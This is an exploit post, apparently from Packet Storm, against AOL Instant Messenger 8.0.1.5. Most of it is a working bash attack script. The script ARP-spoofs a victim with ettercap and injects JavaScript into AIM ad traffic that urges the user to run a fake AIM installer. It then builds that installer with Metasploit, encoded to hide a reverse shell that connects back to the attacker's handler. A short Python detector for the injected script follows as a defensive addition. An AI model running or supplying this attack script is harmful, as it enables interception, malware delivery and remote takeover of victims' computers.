Matt

AOL Instant Messenger 8.0.1.5 Binary Planting

Description : AOL Instant Messenger versions 8.0.1.5 and below suffer from a binary file planting vulnerability.

Author : Marshall Whittaker

Source : AOL Instant Messenger 8.0.1.5 Binary Planting - Packet Storm

Code :

#!/bin/bash

### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working.
### Leverages binary file planting to My Documents via AIM's advertisement code.
### Little social engineering built in using JavaScript to try to get them to run the AIM_Install.exe.
### Starts a reverse shell back to your handler on 192.168.2.5:443 by default.

### Marshall Whittaker

ATTACKER="192.168.2.10";
VICTIM="192.168.2.5";
GATEWAY="192.168.2.1";
REVPORT="443";
PAYLOADSITE="https://dl.dropboxusercontent.com/s/dykenlhdobchjjv/AIM_Install.exe?token_hash=AAE2qGWSZAlAWJKepUu_2fP5UZfg-JTHktBGuu-I4BV34Q&dl=1";

mkdir ~/aimpwn;
echo "if (tcp.src == 80) {" > ~/aimpwn/aimpwn.filter;
echo "if (search(DATA.data, \"atwola\")) {" >> ~/aimpwn/aimpwn.filter;
echo "replace(\"_blank>\", \"_blank><script>alert('A new version of AOL Instant Messenger is available!');window.location = '$PAYLOADSITE'; setTimeout(function(){alert ('Navigate to your My Documents folder and start the installer by clicking AIM_Install and follow the steps.');}, 1000);</script>\");" >> ~/aimpwn/aimpwn.filter;
echo "msg(\"PWNT.\n\");" >> ~/aimpwn/aimpwn.filter;
echo "}" >> ~/aimpwn/aimpwn.filter;
echo "}" >> ~/aimpwn/aimpwn.filter;
etterfilter ~/aimpwn/aimpwn.filter -o ~/aimpwn/aimpwn.ef;
### wget section.
#wget http://download.newaol.com/aim/win/AIM_Install.exe -O ~/aimpwn/AIM_Install.exe;
cp ~/aimpwn/AIM_Install.exe /opt/metasploit/apps/pro/msf3/data/templates/;
msfpayload windows/shell/reverse_tcp LHOST=$ATTACKER LPORT=$REVPORT R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -x AIM_Install.exe -t exe -e x86/call4_dword_xor -c 2 -o ~/aimpwn/AIM_Install.exe;
### Uncomment wget section and put code to upload AIM_Install.exe to a site if you need to
### change ATTACKER IP or port.
ettercap -T -F ~/aimpwn/aimpwn.ef -q -M arp:remote /$GATEWAY/ /$VICTIM/ &
msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=$ATTACKER lport=$REVPORT E;
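
A defensive counterpart, added here as an example and not part of the original post or the Packet Storm entry: the filter above only fires on plain-HTTP responses containing "atwola" and injects an inline script that navigates to an executable, so the same pattern can be searched for in response bodies recorded by a proxy or packet capture. The function names, extension list and sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# File extensions treated as directly runnable on Windows (assumed list).
EXECUTABLE_EXTS = (".exe", ".scr", ".msi", ".bat", ".cmd", ".com")
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# Matches window.location = '...', location.href = "...", document.location = '...'
REDIRECT_RE = re.compile(
    r"""(?:window\.|document\.)?location(?:\.href)?\s*=\s*(['"])(.+?)\1""", re.I)

def find_forced_downloads(body):
    """URLs an inline script navigates to whose path ends in an executable extension."""
    hits = []
    for script in SCRIPT_RE.findall(body):
        for _quote, url in REDIRECT_RE.findall(script):
            # urlparse drops the query string, so "...exe?dl=1" is still caught.
            if urlparse(url).path.lower().endswith(EXECUTABLE_EXTS):
                hits.append(url)
    return hits

def scan_responses(responses, marker="atwola"):
    """responses: iterable of (response_id, body). Only bodies containing the
    ad marker are inspected, mirroring the condition the filter keys on."""
    report = {}
    for response_id, body in responses:
        if marker in body:
            hits = find_forced_downloads(body)
            if hits:
                report[response_id] = hits
    return report

# Constructed sample bodies (not captured traffic); hosts are placeholders.
CLEAN_AD = ('<a href="http://ads.example.invalid/atwola/click" target=_blank>'
            '<img src="banner.gif"></a>')
TAMPERED_AD = ('<a href="http://ads.example.invalid/atwola/click" target=_blank>'
               "<script>alert('Update available');"
               "window.location = 'https://files.example.invalid/AIM_Install.exe?dl=1';"
               '</script><img src="banner.gif"></a>')
BENIGN_REDIRECT = ('<!-- atwola --><script>window.location = '
                   "'https://www.example.invalid/help.html';</script>")
SAMPLES = [("resp-1", CLEAN_AD), ("resp-2", TAMPERED_AD), ("resp-3", BENIGN_REDIRECT)]

if __name__ == "__main__":
    for response_id, urls in scan_responses(SAMPLES).items():
        print(response_id, "inline script forces executable download:", urls)
```

A hit means the ad markup was altered between the server and the client, which on a local network points to the ARP-based interception the script relies on.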
